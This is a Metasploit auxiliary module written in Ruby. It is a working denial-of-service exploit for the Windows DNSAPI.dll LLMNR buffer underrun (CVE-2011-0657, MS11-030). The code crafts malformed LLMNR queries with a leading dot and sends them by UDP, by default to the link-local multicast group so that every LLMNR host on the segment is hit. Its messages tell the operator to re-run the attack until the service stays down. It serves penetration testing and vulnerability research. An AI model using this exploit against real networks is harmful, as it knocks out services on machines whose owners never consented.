##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
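class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  # Largest value the single-octet label length emitted by make_query
  # (pack('C')) can carry; anything longer would silently wrap.
  MAX_LABEL_LEN = 255

  def initialize
    super(
      'Name' => 'Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS',
      'Description' => %q{
        This module exploits a buffer underrun vulnerability in Microsoft's DNSAPI.dll
        as distributed with Windows Vista and later without KB2509553. By sending a
        specially crafted LLMNR query, containing a leading '.' character, an attacker
        can trigger stack exhaustion or potentially cause stack memory corruption.

        Although this vulnerability may lead to code execution, it has not been proven
        to be possible at the time of this writing.

        NOTE: In some circumstances, a '.' may be found before the top of the stack is
        reached. In these cases, this module may not be able to cause a crash.
      },
      'Author' => 'jduck',
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE', '2011-0657' ],
        [ 'OSVDB', '71780' ],
        [ 'MSB', 'MS11-030' ]
      ],
      'DisclosureDate' => 'Apr 12 2011',
      'Notes' => {
        'Stability' => [CRASH_SERVICE_DOWN],
        'SideEffects' => [],
        'Reliability' => []
      }
    )

    # 5355 is the LLMNR port. The default RHOST is the LLMNR IPv4 multicast
    # group, so with the defaults the crafted query is delivered to every
    # LLMNR-enabled host on the local link, not to a single target; set
    # RHOST to a unicast address to confine the DoS to one machine.
    register_options(
      [
        Opt::RPORT(5355),
        Opt::RHOST('224.0.0.252')
      ]
    )
  end

  # Build one LLMNR PTR/IN query packet carrying the name +str+.
  #
  # The header mirrors DNS: 16-bit ID, 16-bit flags, four 16-bit section
  # counts, then a single question (name, type, class).
  #
  # The name is deliberately NOT encoded as proper length-prefixed labels.
  # When +str+ begins with '.', a single length octet covering the whole
  # string is emitted followed by the raw dotted string; otherwise the raw
  # string is emitted with no length octet at all. In both cases a NUL
  # terminates the name. This malformed encoding is the trigger described
  # in the module Description.
  #
  # @param str [String] name to embed (the callers pass names starting with '.')
  # @return [String] binary packet bytes suitable for udp_sock.put
  # @raise [ArgumentError] if +str+ starts with '.' and is longer than
  #   MAX_LABEL_LEN bytes, since the one-octet prefix cannot represent it
  def make_query(str)
    if str.start_with?('.') && str.bytesize > MAX_LABEL_LEN
      raise ArgumentError, "query name exceeds #{MAX_LABEL_LEN} bytes"
    end

    # String.new is binary (ASCII-8BIT), so appending packed bytes never
    # triggers an encoding change or a frozen-literal error.
    pkt = String.new

    # id: random transaction identifier
    pkt << [rand(65535)].pack('n')

    # flags: standard query (qr=0, opcode=0), no conflict/TC/tentative bits
    pkt << [
      (
        '0' +    # qr
        '0000' + # opcode
        '0' +    # conflict
        '0' +    # truncation
        '0' +    # tentative
        '0000' + # zero (reserved)
        '0000'   # rcode
      )
    ].pack('B16')

    # counts: one question, no answer/authority/additional records
    pkt << [1, 0, 0, 0].pack('n*')

    # question name (see method comment). The prefix is a byte count, so use
    # bytesize rather than character length.
    pkt << [str.bytesize].pack('C') if str.start_with?('.')
    pkt << (str + "\x00")

    # type / class (PTR/IN)
    pkt << [0x0c, 0x01].pack('n*')

    pkt
  end

  # Send the two trigger queries (ip6.arpa, then in-addr.arpa) to RHOST:RPORT.
  #
  # Returns nothing; whether the target's service crashed is only observable
  # on the target. The UDP socket is released even if a send raises.
  def run
    connect_udp

    # Alternative name encodings tried during development, kept for reference:
    #   "\x03" + ("%d" % 192)
    #   "\x03" + "144" + "\x01" + "0" + "\x03" + "168" + "\x03" + "192"
    #   ("\x01" + '1') * 0x20
    #   "\x01" + '.'
    #   ("\x01\x2e") + "\x01" + "0"
    #   "\x07" + 'in-addr' + "\x04" + 'arpa' + "\x00"
    #   "\x03" + 'ip6' + "\x04" + 'arpa' + "\x00"
    #   ".e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f".gsub('.', "\x01") + "\x03ip6\x04arpa\x00"

    begin
      pkt = make_query('.1.1.ip6.arpa')
      print_status("Sending Ipv6 LLMNR query to #{rhost}")
      udp_sock.put(pkt)

      pkt = make_query('.1.1.in-addr.arpa')
      print_status("Sending Ipv4 LLMNR query to #{rhost}")
      udp_sock.put(pkt)

      print_status('Note, in a default configuration, the service will restart automatically twice.')
      print_status('In order to ensure it is completely dead, wait up to 5 minutes and run it again.')
    ensure
      # release the socket on every path, including a failed put
      disconnect_udp
    end
  end
end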